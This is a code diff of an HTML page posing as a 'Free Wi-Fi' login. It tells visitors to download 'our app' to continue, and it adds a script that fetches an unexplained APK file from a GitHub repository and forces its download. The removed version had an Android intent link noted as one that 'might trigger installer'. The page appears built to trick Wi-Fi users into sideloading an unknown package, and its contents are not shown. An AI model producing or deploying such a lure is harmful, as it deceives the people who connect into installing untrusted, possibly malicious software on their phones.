--- a/index.html
+++ b/index.html
@@ -1,48 +1,62 @@
 <!DOCTYPE html>
 <html>
   <head>
-    <title>Free Wi-Fi Login</title>
+    <title>Free Wi-Fi</title>
     <meta charset="UTF-8" />
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
     <style>
       body {
         font-family: sans-serif;
-        text-align: center;
-        margin-top: 100px;
         background-color: #f9f9f9;
-        color: #333;
+        text-align: center;
+        padding-top: 100px;
       }
       h1 {
+        font-size: 2em;
         margin-bottom: 20px;
       }
       button {
         font-size: 18px;
         padding: 12px 24px;
-        margin: 10px;
-        cursor: pointer;
-        background-color: #4CAF50;
+        margin-top: 20px;
+        background-color: #2196f3;
         color: white;
         border: none;
-        border-radius: 5px;
+        border-radius: 8px;
+        cursor: pointer;
       }
       button:hover {
-        background-color: #45a049;
+        background-color: #1976d2;
       }
     </style>
   </head>
   <body>
     <h1>Welcome to Free Wi-Fi</h1>
-    <p>Please accept our terms to continue using the internet.</p>
+    <p>Tap below to download our app and continue.</p>
 
-    <!-- Real APK download link -->
-    <a href="https://raw.githubusercontent.com/DeployedCartridge/ReasonablyFriedComputer/main/release/file.apk" download>
-      <button>Download APK</button>
-    </a>
+    <button onclick="downloadAPK()">Download APK</button>
 
-    <!-- Optional: Intent test (might trigger installer) -->
-    <br><br>
-    <a href="intent://raw.githubusercontent.com/DeployedCartridge/ReasonablyFriedComputer/main/release/file.apk#Intent;scheme=https;action=android.intent.action.VIEW;end">
-      <button>Try Intent Link</button>
-    </a>
+    <script>
+      function downloadAPK() {
+        const apkUrl = "https://raw.githubusercontent.com/DeployedCartridge/ReasonablyFriedComputer/main/release/file.apk";
+
+        fetch(apkUrl)
+          .then(response => {
+            if (!response.ok) {
+              throw new Error("Failed to fetch APK");
+            }
+            return response.blob();
+          })
+          .then(blob => {
+            const link = document.createElement("a");
+            link.href = URL.createObjectURL(blob);
+            link.download = "file.apk";
+            link.click();
+          })
+          .catch(error => {
+            alert("Error downloading APK: " + error.message);
+          });
+      }
+    </script>
   </body>
 </html>
